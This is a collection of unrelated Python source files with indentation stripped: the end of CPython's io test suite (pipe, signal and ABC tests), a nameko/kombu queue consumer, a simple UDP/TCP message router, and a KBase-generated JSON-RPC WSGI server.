self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed just below. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
queue_consumer.py
|
from logging import getLogger
import eventlet
from eventlet import event
import threading
from nameko_proxy.event_queue import EventQueue
from kombu import Connection
from kombu.messaging import Consumer
from kombu.mixins import ConsumerMixin
from nameko.constants import (
AMQP_URI_CONFIG_KEY, DEFAULT_SERIALIZER, SERIALIZER_CONFIG_KEY,
HEARTBEAT_CONFIG_KEY, DEFAULT_HEARTBEAT, TRANSPORT_OPTIONS_CONFIG_KEY,
DEFAULT_TRANSPORT_OPTIONS, AMQP_SSL_CONFIG_KEY
)
logger = getLogger(__name__)
class QueueConsumer(ConsumerMixin):
PREFETCH_COUNT_CONFIG_KEY = 'PREFETCH_COUNT'
DEFAULT_KOMBU_PREFETCH_COUNT = 10
def __init__(self, timeout=None):
self.timeout = timeout
self.provider = None
self.queue = None
self.prefetch_count = None
self.serializer = None
self.accept = []
self._managed_threads = []
self._consumers_ready = EventQueue()
self._connection = None
self._thread = None
@property
def amqp_uri(self):
return self.provider.container.config[AMQP_URI_CONFIG_KEY]
@property
def connection(self):
if not self._connection:
heartbeat = self.provider.container.config.get(
HEARTBEAT_CONFIG_KEY, DEFAULT_HEARTBEAT
)
transport_options = self.provider.container.config.get(
TRANSPORT_OPTIONS_CONFIG_KEY, DEFAULT_TRANSPORT_OPTIONS
)
ssl = self.provider.container.config.get(AMQP_SSL_CONFIG_KEY)
self._connection = Connection(self.amqp_uri,
transport_options=transport_options,
heartbeat=heartbeat,
ssl=ssl
)
return self._connection
def register_provider(self, provider):
logger.debug("QueueConsumer registering: %s", provider)
self.provider = provider
self.queue = provider.queue
self.serializer = provider.container.config.get(SERIALIZER_CONFIG_KEY, DEFAULT_SERIALIZER)
self.prefetch_count = self.provider.container.config.get(
self.PREFETCH_COUNT_CONFIG_KEY, self.DEFAULT_KOMBU_PREFETCH_COUNT)
self.accept = [self.serializer]
self.start()
def start(self):
self._thread = threading.Thread(target=self._handle_thread)
self._thread.daemon = True
self._thread.start()
self._consumers_ready.wait()
def _handle_thread(self):
logger.info("QueueConsumer starting...")
try:
self.run()
except Exception as error:
logger.error("Managed thread end with error: %s", error)
if not self._consumers_ready.ready():
self._consumers_ready.send_exception(error)
def on_consume_ready(self, connection, channel, consumers, **kwargs):
if not self._consumers_ready.ready():
self._consumers_ready.send(None)
def on_connection_error(self, exc, interval):
logger.warning(
"Error connecting to broker at {} ({}).\n"
"Retrying in {} seconds.".format(self.amqp_uri, exc, interval))
def unregister_provider(self, _):
if self._connection:
self.connection.close()
self.should_stop = True
def get_consumers(self, _, channel):
consumer = Consumer(channel, queues=[self.provider.queue], accept=self.accept,
no_ack=False, callbacks=[self.provider.handle_message])
consumer.qos(prefetch_count=self.prefetch_count)
return [consumer]
@staticmethod
def ack_message(msg):
msg.ack()
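# Illustrative sketch only, added for clarity (not part of the original module):
# the container config entries this QueueConsumer reads, keyed by the nameko
# constants imported above. The broker URI is hypothetical; in a real service
# the nameko container supplies this mapping as provider.container.config.
EXAMPLE_CONTAINER_CONFIG = {
    AMQP_URI_CONFIG_KEY: 'pyamqp://guest:guest@localhost:5672//',
    HEARTBEAT_CONFIG_KEY: DEFAULT_HEARTBEAT,
    TRANSPORT_OPTIONS_CONFIG_KEY: DEFAULT_TRANSPORT_OPTIONS,
    SERIALIZER_CONFIG_KEY: DEFAULT_SERIALIZER,
    QueueConsumer.PREFETCH_COUNT_CONFIG_KEY: QueueConsumer.DEFAULT_KOMBU_PREFETCH_COUNT,
}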
|
router.py
|
from socket import (
socket,
SOCK_DGRAM,
SOL_SOCKET,
SO_REUSEADDR,
SOCK_STREAM,
SO_BROADCAST,
)
from time import sleep
from json import loads, dumps
from threading import Thread, Semaphore
from queue import Queue
from ..utils.network import (
Decode_Response,
Encode_Request,
Send_Broadcast_Message,
Tcp_Sock_Reader,
Tcp_Message,
Udp_Message,
Udp_Response
)
from io import BytesIO
# How the Router works:
# Thread 1 looks up a list of message queues (much like the client does), asks for a request and enqueues it in a list if that list is empty (guarded by a semaphore).
# Thread 2 dequeues the request if one exists, processes it and finally connects back to the client with the final result.
# Base class for the router
class Router:
def __init__(self):
# mutex
self.channel = []
self.mutex = Semaphore()
self.Broadcast_Address = "192.168.2.31"
self.Broadcast_Port = 10002
self.am_ip = "127.0.0.1"
self.sm_ip = "192.168.2.7"
self.bd_port = 9342
def serve(self):
Thread(target=self._recieve,daemon=True,name="recieve").start()
Thread(target=self._resolve,daemon=True,name="resolve").start()
while(True):
sleep(5)
    # Thread that connects to the message queue to receive a message
def _recieve(self):
while(True):
result = Send_Broadcast_Message('get',self.Broadcast_Address,self.Broadcast_Port,Udp_Response)
if result and not len(self.channel):
with self.mutex:
message = result
print(message)
self.channel.append(message)
else:
sleep(5)
    # Thread that processes the request
def _resolve(self):
        ''' Thread that processes the request '''
while(True):
self.mutex.acquire()
if not len(self.channel):
self.mutex.release()
sleep(5)
else:
print('channel',self.channel)
req = self.channel.pop()
self.mutex.release()
                # Request from a client
if "get" in req:
ip = req["ip"]
port = req["port"]
info = req["get"]
msg = {"get":info}
response = None
if info == "full_list":
response = Tcp_Message(msg,self.am_ip,self.bd_port)
else:
response = Tcp_Message(msg,self.sm_ip,self.bd_port)
                    # Send the response
Udp_Message(response,ip,port)
print(response)
                # Request from a producer
else:
                    # Send the update to DB 1
                    # Send the update to DB 2
#Tcp_Message(req,self.am_ip,self.bd_port)
Tcp_Message(req,self.sm_ip,self.bd_port)
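# Illustrative only, added for clarity (not part of the original router): the two
# request shapes _resolve() distinguishes. Anything carrying a "get" key is a
# client query that is answered over UDP; anything else is treated as a producer
# update and forwarded to the database over TCP. The concrete values are hypothetical.
EXAMPLE_CLIENT_REQUEST = {"get": "full_list", "ip": "192.168.2.50", "port": 10010}
EXAMPLE_PRODUCER_UPDATE = {"update": "some-payload"}  # no "get" key, forwarded as-is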
Router().serve()
|
jayrboltonTestServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from jayrboltonTest.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'jayrboltonTest'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from jayrboltonTest.jayrboltonTestImpl import jayrboltonTest # noqa @IgnorePep8
impl_jayrboltonTest = jayrboltonTest(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
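# Illustrative only, added for clarity (not part of the generated server): shows
# how JSONObjectEncoder lets json.dumps serialize sets and frozensets by turning
# them into lists. Defined but never called, so importing the module is unaffected.
def _json_object_encoder_example():
    payload = {'ids': set([3, 1, 2]), 'tags': frozenset(['a', 'b'])}
    return json.dumps(payload, cls=JSONObjectEncoder, sort_keys=True)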
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
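# Illustrative only, added for clarity (not part of the generated server): how a
# ServerError renders when stringified -- name, code and message on one line,
# followed by the stored trace/data. Defined but never called; the values are
# hypothetical.
def _server_error_example():
    err = ServerError('JSONRPCError', -32601, 'Method not found',
                      data='server-side traceback would go here')
    return str(err)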
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
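# Illustrative only, added for clarity (not part of the generated server):
# getIPAddress prefers X-Forwarded-For, then X-Real-IP, then REMOTE_ADDR, as long
# as the config does not set dont_trust_x_ip_headers to 'true'. Defined but never
# called; the addresses are hypothetical.
def _get_ip_address_example():
    fake_environ = {'HTTP_X_FORWARDED_FOR': '203.0.113.7, 10.0.0.2',
                    'HTTP_X_REAL_IP': '10.0.0.2',
                    'REMOTE_ADDR': '10.0.0.1'}
    # With the X headers trusted this returns '203.0.113.7'.
    return getIPAddress(fake_environ)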
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'jayrboltonTest'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_jayrboltonTest.jayrbolton_contig_filter,
name='jayrboltonTest.jayrbolton_contig_filter',
types=[dict])
self.method_authentication['jayrboltonTest.jayrbolton_contig_filter'] = 'required' # noqa
self.rpc_service.add(impl_jayrboltonTest.status,
name='jayrboltonTest.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'jayrboltonTest ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
